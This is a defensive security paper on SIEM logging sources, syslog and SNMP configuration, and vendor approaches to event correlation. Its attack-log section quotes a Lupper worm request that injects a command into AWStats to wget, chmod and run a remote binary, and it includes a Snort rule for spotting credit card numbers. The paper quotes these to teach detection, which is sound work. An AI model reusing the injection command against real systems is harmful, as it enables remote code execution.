event correlation and siem vendor approaches · what's in the data bucket? event correlation...

What's in the data bucket?Event Correlation and SIEM Vendor Approaches

STI Joint Written Project

Authors: Brough Davis, Jim Horwath, John ZabiukAdvisor: Stephen Northcutt

Accepted: April 12, 2010

AbstractAs technology progresses IT professionals and Security analysts are presented with an everincreasing volume of data to parse through to find evidence of security events. Manycompanies rely on disparate logging architectures that split network, server, and applicationlogging. Each of these logging architectures are often isolation from each other. Thesecurity threats to a company are always increasing and it is becoming imperative for acompany to have a well designed logging infrastructure that consolidates, archives, andcorrelates all useful logging information from as many parts of a company's network aspossible. Not only is it becoming imperative to stop intrusions from both external andinternal attackers but it is crucial for protecting critical information from getting into thewrong hands. Many vendors are starting to offer appliances called SIEM's (SecurityInformation Event Management) that claim to provide these functions. Are these appliancesa silver bullet to help protect companies?

What's in the data bucket?

STI Joint Written Project - May 2010 1

1. Executive Summary

This purpose of this paper is to discuss how a Security Information and Event Managementsystem can prevent or mitigate data loss by detecting both network intrusions andextrusions. Such losses of data can cost organizations in the millions of dollars to recoverfrom – some organizations may never recover. Several key area will be examined with theintent to discuss how different vendors SIEM products can mitigate these areas. The areasdiscussed are:

• Identification of infected systems trying to exfiltrate information• Countermeasures to detect attempts to infect internal systems• Detection of outbound sensitive information• Mitigation of the impact of infected systems

In order for an organization to benefit the most from a SIEM, a great deal of data must begathered from numerous devices and applications throughout the network. These devicescould range from a simple router to a complex business-critical application. This paper willdiscuss these various sources of log data and the service used to collect that data.

Once data has started being collected, the next task that an organization must tackle is howto correlate the different logs in order to identify where and when an attack is occurring orhas occurred. Without additional log analysis software, this can be a daunting, if notimpossible task. To that end, the use of a SIEM to detect and prevent attacks will beexamined in detail. Several different SIEM vendors have agreed to share the approach theytake to address the identified key areas for discussion. The vendors providing input to thispaper are, in alphabetic order:

• LogRythm• Nitro Security• Prism Microsystems• QRadar (by Q1Labs).

The methods each vendor solution deals with different attacks will be discussed in detail.Finally a summary will be provided in the form of a comparison chart outlining the ability ofeach solution to handle specific issues. As well, a relative comparison of cost will be includedin the comparison.



2. Problem Description

Over the past decade, network intrusions and subsequent data loss have become more andmore frequent. The cost of data loss to an organization may be small, but it can also bevery large. The Ponemon Institute produces an annual report, The US Cost of Data Breach,which outlines various aspects of the costs associated with data breach and data loss.According the 2009 US Cost of Data Breach Study, the average cost of insider databreaches in 2009 was $6.7 million per incident. This is an increase from $6.65 million in2008. The cost per customer record rose from $202 to $208. The most expensive databreach included in the 2009 report cost nearly $31 million to resolve. The lease expensivedata breach cost $750,000 to resolve. Not only will such data breaches impact anorganization in present day costs, but also in terms of future revenue. According to thePonemon Institute, 20% of consumers terminated a relationship with a company after beingnotified of a security breach.

The purpose of this paper is to discuss how a Security Information and Event Management(SIEM) systems can be utilized to detect intrusions and extrusions, or data loss. It willprovide guidance that organizations can use to accomplish actionable results using a SIEM.In specific, the following areas will be discussed:

• Identification of infected systems trying to exfiltrate information• Countermeasures to detect attempts to infect internal systems• Detection of outbound sensitive information• Mitigation of the impact of infected systems

To assist in the discussion of this topic, the assistance of four SIEM vendors has beenenlisted. A discussion of how each vendor’s solution addresses each of the afore mentionedareas of discussion will be provided. The vendors assisting with this paper, in alphabeticalorder, are:

• LogRythm (www.logrythm.com)• Nitro Security (www.nitrosecurity.com)• Prism Microsystems (www.prismmicrosys.com)• QRadar (www.q1labs.com)

Network Example

A typical network design used by small to medium businesses was used as the basis for thisreport. The network consists of a Microsoft Active Directory environment in two sites withapproximately 35 workstations at the primary site, and 25 at the secondary site. All



http://www.logrythm.com/

http://www.nitrosecurity.com/

http://www.prismmicrosys.com/

http://www.q1labs.com/

workstations are running either Windows 7 or Windows XP. Within the DMZ for thisnetwork, web, email, and DNS services are provided. With the exception of the web serverand the Syslog server, which are running Red Hat Linux, all servers are running eitherWindows Server 2003 or 2008. Each site is utilizing either a Cisco 2800 or Cisco 1800 as theperimiter gateway and first line of defense. Beyond each site perimeter, a Cisco ASA 5510firewall appliance is used to provide more in-depth protection. To communicate betweensites, an IPSec VPN is established between the perimiter router at each site. Although theprimary use of this network is for static users, there are several that require VPN accessfrom remote locations. This is accomplished with the Cisco VPN client connecting to theASA 5510.

The following is a diagram of this network.

3. Logging Sources

In order to get the greatest benefit out of a SIEM system it's important for a company toreview all the different logging sources across Network devices, Servers, Workstations, andbusiness critical applications. The following sections review common configurations forenabling logging from each of these four areas.



Importance of Time

Before logging configurations are described it's important to note that in order to accuratelycorrelate multiple logs from different sources the time stamps in the logs must be consistentbetween each other. For example, an attacker may find an exploit on a DNS server andthen create user accounts and start downloading attack tools. These actions could betracked in netflow data, syslog data, and IDS log data. If the clocks on the logging sourceswere not consistent then then comparing which event happened first and how much timepassed between events would make correlating the events very difficult. In effect bad timesources could destroy any correlation attempts and treat each event as singular non-relatedevent. This is especially bad if each event by themselves is not considered a cause foralarm.

To ensure that all logging sources have identical clock times it is highly recommended thatNTP (Network Time Protocol) be used across all devices. Using an internal GPS/CDMAbased stratum 1 appliance is recommended in medium/large networks. Using ntp.pool.orgsystems can help in small/medium size networks. Monitoring the NTP state on systems isalso recommended to ensure devices maintain connectivity to their NTP servers.

TimezoneIt's common to configure a devices Timezone to the local time the Network/System Adminswork in but this may create problems if not all the devices are configured with the sametimezone. If devices are putting timestamp information in the logs this may createcorrelation problems on a central logging or SIEM system. If the SIEM system can notconvert the timezones then the log files can not be successfully correlated. This problemcan be handled in different ways; the device sending logs does not send timestampinformation and the logging server itself timestamps the message when recieved, or onetimezone is used across all equipment (eg. UTC). Using UTC as the standard timezone issometimes preferred as all other timezones shift from UTC which is easier to reference in aglobal company. UTC also avoids daylight savings time (DST) software bugs that commonlysurface from time to time.

Syslog and SNMP Trap

Many of the events are sent to both syslog and snmptrap. SNMP Trap logs have a longhistory with being integrated into alarm management to alert to specific conditions networkadministrators want to be alerted to. Syslog is good at sending all event information inorder to help provide a good picture of the condition of a network device at a given time.SNMP Trap configurations traditionally also have related RMON threshold configurationsthat allow network admins to have SNMP Trap messages sent when certain conditions (eg.CPU Utilization) meet a threshold value (eg. 75%). Having both SNMP Trap and Syslog



messages being sent from network devices allows for both good device state information aswell as specific alarm criteria in order to help build a better message archive that can beused to correlate against to weed out possible malicious activity.

Network

One of the first steps a company must take in the pursuit of a robust logging infrastructureis to audit the network perimeter around criticial systems. Having a good understanding ofall the network devices allows for better deployment and configuration management oflogging. By deploying consistent logging configurations across all equipment a companycan get the most benefit out of log correlation. Common network devices on a network mayinclude but are not limited to the following:

• Router• Switch• Firewall• Modems• IDS/IPS• Wireless AP• Vulnerability Scanner

Some examples of these device and their logging configurations will be described below.

• Cisco IOS• Cisco Firewall PIX/ASA/FWSM• Snort Intrusion Detection System (IDS)

Cisco IOS

Folloing configurations are identical across most Cisco devices running IOS code 12.x suchas the 3750 switch, 2900 Router,1800 Router, and Airopoint 1400 Wireless Access Point.Cisco IOS can provide syslog, snmp trap, and netflow

SyslogConfiguring syslog on Cisco devices running IOS 12.x is a pretty standard configuration.Some configuration options are useful if you want to enable which severity level, includingthe hostname and device timestamp in the logs.

Warning: Enabling debug level syslog messages to console may cause high CPU utilizationon a device if the logs are verbose which may render a device unusable. Making sureconsole level logging is low or turned off is a good idea during standard operation.



no logging console

logging trap debugging

logging source-interface Loopback0

logging 2.2.2.2

SNMP TrapCisco snmptrap configuration is fairly straightforward. Many events that are logged insyslog events has an equivalent snmptrap event. A common mistake is to enable allsnmptraps. This ends up sending every possible event to a monitoring system which acrossa large infrastructure may overload a monitoring system or even cause network congestionon 'bottle neck' segments. Knowing the type of events to alarm on is not only conservesresources but also helps focus the type of events that are critical to the network and thecompany. The below example sends snmptrap messages to 10.10.10.10 for config changes,bgp events, and AAA events. Note that global traps are enabled for BGP and config eventsbut the AAA events are specific to the 10.10.10.10 host only.

snmp-server host 10.10.10.10 public config bgp aaa

snmp-server enable traps config

snmp-server enable traps bgp

NetflowNetflow data will provide an important view into operations on your network. Netflow data,also known as session data reports on conversations between two systems. Netflow datawill show connections to malicious sites, conversations using protocols that violate securitypolicies and/or best practices, along with conversations of long durations. In anenvironment leveraging a SIEM, correlation using Netflow data can improve monitoring,alerting, and reporting capabilities. Netflow data can help analysts identify targets ofattacks, and identify malicious sites targeting your network. The following exampleconfigures Netflow v9 to export ingress traffic on interface serial 3/0/0 to the Netflowcollector(2.2.2.2) on UDP port 9997.

ip cef

ip flow-export version 9

ip flow-export destination 2.2.2.2 9997

interface serial 3/0/0

ip flow ingress

NTP



NTP configuration for the Cisco IOS can be easily enabled but has additional security optionsthat are sometimes over looked. Basic NTP messages can be easily spoofed, easy toenumerate information such as internal NTP servers, and be open to DoS attacks to the NTPservice or router itself. Enabling NTP key authentication, restricting NTP servers and clientswith access-lists, and disabling the NTP service on public interfaces will reduce the possiblityof NTP manipulation from attackers. The below example has a router configured to use 3ntp servers, restrict any ntp updates from only those 3 servers, allows the network10.10.10.0/24 to use the router as a NTP server, source NTP messages from the Loopback0interface, disables NTP services on public serial 0/0 interface, and has NTP authenticationenabled.

Router(config)#ntp server 1.1.1.1



Router(config)#access-list 20 permit 1.1.1.1 0.0.0.0



Router(config)#access-list 20 deny any

Router(config)#ntp access-group peer 20


Router(config)#access-list 21 deny any

Router(config)#ntp access-group serve-only 21

Router(config)#ntp source Loopback0

Router(config)#ntp authenticate

Router(config)#ntp authentication-key 10 md5 MySecretKey

Router(config)#ntp trusted-key 10

Router(config)#interface serial 0/0

Router(config-if)#ntp disable

WARNING: Configuring NTP authentication does not require all clients to use NTPauthentication; it enables clients to use authentication. Your router will still respond tounauthenticated requests, so be sure to use ACLs to limit NTP access.

Cisco PIX/ASA/FWSMThe Cisco PIX/ASA firewall appliances and Catalys 6500 service modules have basic syslogand advanced syslog configuration options. Basic SNMP trap configuration options are alsoavailable.

Basic SyslogThere are a handful of syslog options that need to be taken into account such as includingtimestamps, host-id, and standby log information in addition to the standard logging



serverity and syslog host. The below example enables syslog, includes timestamp, includeshostname, and sends debug level messages to 2.2.2.2 facing the inside interface. Also notethat notification severity logs are sent to the system buffer which will not include verboseconnection entries but useful access-list deny log messages.

logging enable

logging timestamp

logging standby

logging buffered notifications

logging trap debugging

logging device-id hostname

logging host inside 2.2.2.2

Warning: Debug mode will log every connection traversing the firewall which will drasticallyincrease the amount of syslog messages going to the syslog server. Proper disk storagecapacity and I/O speeds will have to be in place in order allow for enabling debug levellogging. Debug level logs may also increase CPU utilization on the firewall as well asadditional bandwidth resources to the syslog server. It is recommended to use theadvanced syslog option if specific debug level output is needed without sending all debuglogs.

Advanced SyslogPIX/ASA 7.0 provides several mechanisms that enable you to configure and manage syslog messages ingroups. These mechanisms include message severity level, message class, message ID, or a custommessage list that you create. With the use of these mechanisms, you can enter a single command thatapplies to small or large groups of messages. When you set up syslogs this way, you are able to capturethe messages from the specified message group and no longer all the messages from the same severity.

The below example captures all VPN (IKE and IPsec) class system log messages withdebugging level or higher in addition to sending all notification level events.

hostname(config)#logging enablehostname(config)#logging timestamphostname(config)#logging list my-list level debugging class vpnhostname(config)#logging list my-list level notificationhostname(config)#logging trap my-listhostname(config)#logging host inside 192.168.1.1

SNMP TrapCisco firewall SNMP traps typically are only used for standard traps: authentication, coldstart, link up and link down. While these alarms are typically only used for hardware



malfunctions it can also be useful in situations where a security event maybe related(eg.attacker brute forcing an ssh login). The below configuration example sends SNMP trapsfrom the inside interface to a SNMP trap server with the SNMP community string of'supersecret'

snmp-server host inside 1.1.1.1 trap community supersecret

NTPPIX/ASA devices can only be configured as NTP clients and are not able be used as a NTPserver time source. The following configuration example has the PIX/ASA using the NTPserver 2.2.2.2 facing the inside interface using a md5 hashed passphrase of 'supersecret'for authentication.

ntp authentication-key 1 md5 supersecretntp trusted-key 1ntp server 2.2.2.2 key 1 source inside

Snort IDS/IPS

Intrusion Detection Systems are a valuable source of logging information for adding valuefor log correlation. A common opensource IDS is called SNORT. Snort has many differentlogging outputs. To send alerts to syslog, use the -s switch or by using the alert_syslogoutput variable in the snort.conf file. The default facilities for the syslog alerting mechanismare LOG AUTHPRIV and LOG ALERT. The below snort.conf example configuration file wilsend snort alerts to the local syslog local6 facility. The syslog or syslog-ng configurationscan then send the alert messages to a remote server.

...#end of file

output alert_syslog: log_local6 log_alert

output alert_fast: alert

Servers/Workstations

The majority of workstations common to many business environments are using MicrosoftWindows Operating Systems such as Windows XP, Vista, and now Windows 7. EnterpriseLinux as well as Microsoft Windows 2003/2007 Server distributions are popular in manyserver environments.



Enterprise Linux 3/4/5

Enterprise Linux distributions such as Red Hat Enterprise Linux and Centos 3,4,5 arecommon Linux server operating systems. System messages can be sent to a central loggingsystem using common opensource logging applications such as syslog, syslog-ng, rsyslog,and snmptrapd.

SyslogThe syslog application found on most Linux systems is called syslog. The below syslog.conffile entry allows a server to send all severity messages to the remote host named'logserver'. 'logserver' would be defined in dns or the /etc/hosts file.

*.* @logserver

Syslog-ngSyslog-ng (syslog next generation) was an application that extended syslog with additionalfeatures such using TCP and making more advanced filtering options. The below example ofthe syslog-ng.conf file shows how to send all messages to a remote syslog-ng loggingserver named 'logserver'.

source from_local {

unix-stream ("/dev/log");

pipe ("/proc/kmsg" log_prefix("kernel: "));

internal();

};

destination central_log {

tcp("logserver" port(514));

};

log {

source(from_local);

destination(central_log);

};

rsyslogrsyslog is one of the more recent logging applications and is the current standard loggingapplication on enterprise linux distributions. The following rsyslog.conf configuration willforward all system messages to a remote server named logserver over TCP port 514. UDPand RELP('reliable protocol') are also optional protocols for sending messages via rsyslog.

*.* @@logserver:514 #TCP



NTPThe NTP application service comes standard on most Linux distributions and is usuallyenabled to point at ntp.pool.org systems or other common distribution specific NTP serverson the Internet. The following example ntp.conf file shows time being received from the NTPserver ntp.pool.org systems. Additional security options to restrict NTP queries and changesvia NTP are also included.

driftfile /var/lib/ntp/ntp.driftserver 1.north-america.pool.ntp.orgserver 2.north-america.pool.ntp.orgserver 3.north-america.pool.ntp.org# By default, exchange time with everybody, but don't allow configuration.restrict -4 default kod notrap nomodify nopeer noqueryrestrict -6 default kod notrap nomodify nopeer noquery# Local users may interrogate the ntp server more closely.restrict 127.0.0.1restrict ::1

Microsoft Windows

• Windows 2003/2008 Server• Windows XP/Vista/7

Microsoft Windows systems typically use third party applications to send event loginformation to a remote server. One common application used on many Windows OperatingSystems is called SNARE. Below is a picture of network configuration section for SNARE inwhich local logs can be sent to a remote server(snare,syslog,syslog-ng,etc).



Snare Agent includes a MSWinEventLog tag before each message. Match this tag with aprogram filter in syslog-ng.conf, and use flags(final) to route the logs from Windows into acustom file before any subsequent destination.

filter windows {

program(MSWinEventLog);

};

destination windows {

file("/var/log/archive/windows/$R_YEAR/$R_MONTH/$R_YEAR-$R_MONTH-$R_DAY"

template("$ISODATE <$FACILITY.$PRIORITY> $HOST $MSG\n")

template_escape(no)

);

};

log {

source(local); filter(windows); destination(windows);



flags(final);

};

NTPWindows desktops can be configured to get time information from NTP services through theControl Panel->Date Time settings as seen in the below example.

Applications

Many companies have a difficult time tracking all the different applications that run in theirnetwork. It's important that a company understands the applications that are critical to thebusiness in order to assess what logging can be beneficial from those applications. Beloware some commonly found applications and their respective configurations in order toenable logging to a remote syslog server.

• Apache• BIND• Microsoft Exchange• Microsoft SQL• Tripwire



Apache

Apache is a common web server application found on many different Operating Systems.The main configuration file used for apache is httpd.conf. Error events and Access eventsare treated separately and usually log to different locations.Error Logs The error log is usually written to a file (typically error_log on UNIX systemsand error.log on Windows and OS/2). On UNIX systems it is also possible to have the serversend errors to syslog or pipe them to a program.

ErrorLog syslog:local1

Sending apache logs to syslog requires a local syslog daemon to relay the syslog messagesto a central syslog server.

Access LogsUnfortunately, only the error log has this feature built in. It's extremely useful to also haveyour access logs logged to a remote server, for the reasons described earlier.There is a technique to allow you to log your access log to syslog as well. However, as withany other article of this nature, we encourage you to check the Apache web serverdocumentation site because this feature may be built-in at some point in the future,rendering this technique obsolete. At the moment, here's what you need to do. This is atwo-step process.First, create a script that is capable of sending entries to syslog:

#!/usr/bin/perl

use Sys::Syslog qw( :DEFAULT setlogsock );

setlogsock('unix');

openlog('apache', 'cons', 'pid', 'local2');

while ($log = <STDIN>) {

syslog('notice', $log);

}

closelog

Second, point your access log at this script using the piped logfile syntax:

CustomLog |/usr/local/apache/bin/apache_syslog combined



BIND

BIND (Berkeley Internet Name Daemon) is a common DNS application service. BIND canlog events to syslog fairly easily by adding the following options to the named.confconfiguration file.

logging {

channel syslog_chnl {

syslog local1;

severity info;

};

};

Sending bind logs to syslog requires a local syslog daemon to relay the syslog messages toa central syslog server.

Microsoft Exchange

Microsoft Exchange server logs can be sent to remote logging server using many differentapplications available. A common application used is called Snare. Snare Epilog for Windowsis a program that facilitates the central collection and processing of Windows text-based logfiles. Epilog for Windows also supports date stamped log files such as IIS, ISA, SMTP andExchange message tracking logs. Log information is converted to tab delimited text format,then delivered over UDP to a remote server. The following picture describes where the logformat options are configured in snare.



Microsoft SQL

One method for sending Exchange and MSSQL event logs to a remote server is to use theSNARE application for MSSQL. The development of 'SNARE for Microsoft SQL Server' allowsevents generated by MS SQL to be collected and forwarded to a remote audit collectionfacility. The SnareMSSQL service can be configured to monitor a variety of MSSQLconfigurations. The default is to monitor the master database within the default local MSSQLinstance. This can be modified on a per objective basis to specify a named MS SQL instanceand a database within that instance. The below example shows the configuration page forsetting which database instance and logging information to send to the remote loggingserver.

TripWire

Host intrusion detection is an important piece to every network that deploys a defense indepth methodology. Effectively correlating log events requires using both network eventsand host based events. There are different host intrustion detection system (HIDS)applications for both Windows and Linux operating systems. One application that iscommon to both Windows and Linux is called Tripwire.



To enable tripwire to log to syslog requires changing the "SYSLOGREPORTING" variable inthe twcfg.txt configuration file. The variable is describe in more detail below.

SYSLOGREPORTINGIf this variable is set to true, messages are sent to the syslog for four events: database

initialization, integrity check completions, database updates, and policy updates. The syslogmessages are sent from the "USER" facility at the "NOTICE" level. The following logmessages are examples of 4 different types of logging messages found in the current Linuxopensource Tripwire 2.3 version.

Jun 18 14:09:42 lighthouse tripwire[9444]: Database initialized:/var/lib/tripwire/test.twd

Jun 18 14:10:57 lighthouse tripwire[9671]: Integrity Check Complete:TWReport lighthouse 20000618141057 V:2 S:90 A:1 R:0 C:1

Jun 18 14:11:19 lighthouse tripwire[9672]: Database Update Complete:/var/lib/tripwire/test.twd

Jun 18 14:18:26 lighthouse tripwire[9683]: Policy Update Complete:/var/lib/tripwire/test.twd

The letters in the Integrity Checking log correspond to # of violations, maximum severitylevel, and # of files added, deleted, and changed, respectively. With any value other thantrue, or if this variable is removed from the configuration file, syslog reporting will be turnedoff.

Tripwire 4.x and 7.x versions can be installed on windows operating systems as well as AIX.The following are some examples of Tripwire 7.x logs.

May 3 10:23:17:2010 172.23.6.115 TE: Information HostName=tripwire LogId=-9223372036788055483 LogCategory="Policy Score Change" LogUser=gumby NodeId=-9223372036793548952 NodeName=chum.jwp.com NodeIp=10.10.10.10 AssociatedObjects=-9223372036854775636:-9223372036841274731,-9223372036854775751:-9223372036793548952 Msg="The score for Node 'chum.jwp.com'

under Policy 'IBM AIX 5.1 Benchmark - CIS v1.0.1' changed from 'Failing' to 'Gold or better'."

May 3 14:02:52:2010 172.23.6.115 TE: Information HostName=tripwire LogId=-9223372036788055473 LogCategory="Policy Test" LogUser=system

AssociatedObjects=-9223372036854775636:-9223372036841274731,-9223372036854775636:-9223372036853067338,-9223372036854775636:-9223372036853067349,-9223372036854775636:-9223372036853067354,-9223372036854775636:-9223372036853069355,-9223372036854775636:-9223372036853069358,-9223372036854775636:-9223372036853069377,-9223372036854775636:-9223372036853070994

Msg="Deleted 79 test results and 0 waivers affecting 8 policies[LF]Policy MS Windows Server 2003 DC Legacy Benchmark - CIS v2.0: Deleted 3 test results for this policy that were more than 31 days old.[LF]Policy MS Windows Server 2003 DC Specialized Security Benchmark - CIS v2.0: Deleted 3 test results for this policy that were more than 31 days

old.[LF]Policy IBM AIX 5.1 Benchmark - CIS v1.0.1: Deleted 104 test results for this policy that were more than 31 days old.[LF]Policy MS Windows Server 2003 DM Enterprise Benchmark - CIS v2.0: Deleted 3 test results for this policy that were more than 31 days old.[LF]Policy MS Windows Server 2003 DM Specialized Security Benchmark - CIS v2.0: Deleted

3 test results for this policy that were more than 31 days old.[LF]Policy MS Windows Server 2000 Level 2 Benchmark - CIS v2.2.1: Deleted 1 test results for this policy that were more than 31 days old.[LF]Policy MS Windows Server 2003 DM Legacy Benchmark - CIS v2.0: Deleted 3 test results for this policy that were more than 31 days old.[LF]Policy MS

Windows Server 2003 DC Enterprise Benchmark - CIS v2.0: Deleted 3 test results for this policy that were more than 31 days old.[LF]"



May 3 14:43:56:2010 172.23.6.115 TE: Information HostName=tripwire LogId=-9223372036788055472 LogCategory=Security LogUser=system Msg="Login attempt for 'gumby' failed."

4. Logging Services

SYSLOG

Network devices can produce large quantities of log messages in a very short period.Without additional configuration, these messages are displayed on the locally attachedconsole only. Some of these messages are routine, while others may indicate that thedevice is about to fail. Unless someone is consistently watching the console for thesemessages, they are lost. This problem is compounded further with each additional deviceon a network. To help reduce the loss of important log messages, most network devicesallow for the forwarding of these messages to a syslog server over an IP network.

Developed in the early 1980’s by Eric Allman, syslog was originally designed to workexclusively with Sendmail. Since then, its popularity has increased exponentially and isimplemented in nearly all network devices. The current documentation for syslog resides inRFC5424.

The syslog facility allows devices to forward log messages over an IP network to a datastore on a remote host. Many devices that do not have any other communication meanscan use this functionality to notify administrators of error conditions. Prior to syslog, eachdevice and application would handle log messages differently. Messages could be written toSTDERR, to a file, or to a pipe. There are many uses for the syslog facility ranging frombasis log message aggregation to network management and security auditing. The syslogfacility is cross-platform based, meaning that non-homogeneous devices can send logmessages to a single repository. Syslog provides for the ability of messages to be sorted,either by their severity level or by their source. Messages can be sent to a variety ofdestinations including log files, users’ terminals, or remote systems. Once these logmessages are stored in a single repository, they can be analyzed by a variety of opensource and third party applications.

There are numerous implementations of syslog. This section of the report will discuss threeof these implementations – syslogd, rsyslog, and syslog-ng.

Table 1 - Syslog facility namesFacility Program using the facility* All facilities except “mark”



auth Security and authorization-related commandsauthpriv Sensitive/private authorization messagscron cron daemondaemon System daemonsftp ftpdkern kernellocal0-7 Eight flavors of local messagelpr Line printer spooling systemmail sendmail (and other mail applications)mark Timestamps generated at regular intervalsnews Usenet newssyslog syslogd internal messagesuser User processesuucp Obsolete

Table 2 - Syslog severity levels (descending severity)Level Meaningemerg Panic situationalert Urgent situationcrit Critical conditionserr Other error conditionswarning Warning messagesnotice May be worth investigatinginfo Informational messagedebug For debugging only

SYSLOGD

Syslogd is the basis for input that many log management systems use. The origins ofsyslogd begin in BSD, however many other syslog implementations are based on syslogd.

The syslog architecture consists of three parts:o Syslogd – The logging daemono Openlog – Library routines that submit messages to syslogdo Logger – a user-level command to submit log messages from the shell

Syslogd is a daemon that runs continuously on a system and is started at boot time. It isnot controlled by inetd. Messages by applications are sent to a special file called /dev/log (aUNIX domain socket). Syslogd reads messages sent to /dev/log and, based on itsconfiguration (syslog.conf) file, routes them to the defined destination.



The syslog.conf file controls the behavior of syslogd. Syslog.conf is a simply formatted textfile with the basic format being:

selector <Tab> actionor

facility.level <Tab> actionexample:

mail.info /var/log/maillog

This would cause all informational messages from the mail system to be saved in the file/var/log/maillog. Syslogd produces timestamp messages, which are logged if the “mark”facility appears in syslog.conf to specify a destination for them. These timestamps allownetwork administrators the ability to establish exact time of an issue.

SYSLOG-NG

Syslog-ng is an open source implementation of syslog which extends the original syslogdmodel with content-based filtering, rich filtering, additional flexibility in configurationoptions, and adds additional features. One such feature is the ability to utilize TCP for thetransport protocol to provide reliability. Syslog-ng was introduced in 1998 by BalazsScheidler as a project to port the existing nsyslogd code to Linux.

Of the various extensions to syslogd are the following:

• ISO 8601 timestamp with millisecond granularity and time zone information• Addition of the name of relays in the host fields to allow tracking of the path a

message has traversed• Reliable transport using TCP• TLS encryption

Syslog-ng offers much wider functionality that transporting syslog messages. It alsoprovides the following features:

• Ability to format log messages using variable expansion• Use of viable expansion when naming files• Ability to send log messages to local applications• Ability to message flow-control in network transport• Logging directly to a database• Rewrite portions of the syslog message with set and substitutable primitives• Classify incoming log messages and at the same time extract structured information

from the unstructured syslog message• Generic name-value support



• Ability to process structured message formats over syslog

RSYSLOG

Rsyslog is an enhanced version of syslogd. It is licensed under GPL (General PublicLicense). Introduced in 2004 by Rainer Gerhards, the goal of the rsyslog project is toprovide a more feature-rich, reliable syslog daemon. Reliability is accomplished through theuse of TCP as the transport protocol. Initially, rsyslog did not support reliable-syslog orTCP. Instead, rsyslog supported database integration and enhanced configuration.One of the design goals of rsyslog is to act as a direct replacement for the syslogd daemon.

ALTERNATIVES TO SYSLOG

Although syslog is essentially ubiquitous among network devices, it is not natively supportby Microsoft Windows, however there are numerous 3rd party applications that allow the usesyslog. As an alternative to syslog, two options worthy of note are SNMP and MicrosoftOperations Manager. Of these two, only SNMP will be discussed as this is an alternativethat can be utilized without the addition infrastructure to the sample environment.

SNMP

SNMP or Simple Network Management Protocol is an Internet standard protocol designed tofacilitate the management of devices on IP networks. SNMP is supported by virtually allnetwork devices, including routers, switches, printers, workstations, servers, modems,uninterruptable power supply (UPS) systems, VOIP phones, HVAC systems, many cellularsmart phones, and more. SNMP can be used to simply monitor the health of a networkdevice, or it can be used to even manage and control network devices. SNMP can gatherinformation ranging from basic device status or traffic statistics to device specificinformation such as air temperature and humidity inside a switch. SNMP is supportednatively by MS Windows.

SNMP is utilized through a relatively simple set of operations. These operations allowdevices to be queried for specific information or for specific parameters to be modified on adevice. Through SNMP, for example, one can determine the operating characteristics of aswitch interface by querying the switch. One could also use SNMP to shutdown or activate aswitchport. The commands that SNMP uses are as follows:

• get• getnext



• getbulk (SNMPv2 and SNMPv3)• set• getresponse• trap• notification (SNMPv2 and SNMPv3)• inform (SNMPv2 and SNMPv3)• report (SNMPv2 and SNMPv3)

There are three versions of SNMP. SNMPv1 is the original version of the SNMP protocol. Itis defined in RFC 1157. SNMPv2 extended the type of information that could be gatheredby SNMP and is defined in RFC 3416, RFC 3417, and RFC 3418. SNMPv3 is the most recentversion of SNMP. SNMPv3 is the first implementation of SNMP that introduces strongsecurity. Whereas SNMPv1 and SNMPv2 pass all information in clear text, SNMPv3 can beconfigured to encrypt all SNMP packets. SNMPv3 is defined in RFC 3410, RFC 3411, RFC3412, RFC 3413, RFC 3414, RFC 3415, RFC 3416, RFC 3417, RFC 3418, and RFC 2576.

SNMP has two components – a manager, and an agent. Agents are configured on thedevices to be monitored. The manager is the system, typically a Network ManagementSystem (NMS) that generates requests for information and receives information being sentfrom the various devices. SNMP can also be used to send traps. Traps are, essentially,alerts sent from a device to a manager indicating that something has gone wrong. The trapmessage will include specific information about the fault, allowing the network administratorto more easily resolve the issue. Traps can be equated to syslog messages. There areseven generic traps, however each device has the capability to send more specific traps, asdefined by the developer or manufacturer.

Table 3 - SNMP Generic TrapsGeneric trap name (andnumber)

Meaning

coldStart (0) Indicates that the agent has rebootedwarmStart (1) Indicates that the agent has reinitialized itselflinkDown (2) Indicates that an interface on a device is gone downlinkup (3) Indicates that in interface on a device has gone upauthenticationFailure (4) Indicates that an attempt to query a device with an incorrect

authentication credentialegpNeighborLoss (5) Indicates that and EGP neighbor has gone downenterpriseSpecific (6) Indicates that a trap is enterprise-specific. In other words,

it is a trap specific to the device as defined by the developeror manufacturer



5. Using/Correlating Data

Logging Attacks

In order to see the value from correlating events it's important to look at an attack from abroader view to understand the goals of an attack. A single event may be only one smallpiece of an overall attack strategy of an attackers goal. Below are some examples of singleevents that can be seen across different logging and alarming systems are shown below.

Apache Log - wormThe following is an example Apache log entry of an attack by the Lupper worm, against theAWStats command-injection vulnerability:

[24/Dec/2005:13:02:18 +1300] GET

/cgi-bin/awstats.pl?

configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20xx%2eyyy%2ez%2e216%2fnikons%3bchmo

d%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|

HTTP/1.1

Certain versions of the awstats program would execute the code"echo%20YYY;cd%20%2ftmp%3bwget%20192%2e168%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;"in response to this request. This would cause the file at '192.168.1.216/nikons' to bedownloaded and stored in the /tmp directory. Then it would be made executable using the'chmod +x nikons' and finally it would be executed.

DLPBelow is an example of a SNORT Rule that looks for credit card numbers being transferredin clear text.

#alert ip any any -> any any (msg:"ET POLICY Credit Card Number Detected in

Clear (15 digit dashed)"; pcre:"/

(3[4|7]\d{2}|2014|2149|2131|1800)-\d{4}-\d{4}-\d{3} /";

reference:url,www.beachnet.com/~hstiles/cardtype.html; classtype:policy-

violation; reference:url,doc.emergingthreats.net/2001380;

reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/

POLICY_Credit_Card_Numbers; sid:2001380; rev:12;)

Unusual Traffic PatternsThe following Netflow traffic patterns have outbound UDP port 53 traffic that does not matchcommon traffic patterns for the local network. This could be a compromised systemsending information out of the company network or it could be normal traffic.



router#sh ip cache flow

----------------------------------------------------------------------------

---

IP packet size distribution (435092M total packets):

1-32 64 96 128 160 192 224 256 288 320 352 384 416 448 480

.000 .296 .026 .017 .003 .019 .006 .001 .002 .003 .001 .002 .001 .001 .002

...

Protocol Total Flows Packets Bytes Packets Active Idel

-------- Flows /Sec /Flow /Pkt /Sec /Flow /Flow

...

TCP-other 10428853693 2428.1 10 677 26088.3 0.4 1.3

UDP-DNS 5508635330 1282.5 1 804 1799.1 0.0 3.7UDP-NTP 7312730 1.7 1 77 1.7 0.0 5.4

...

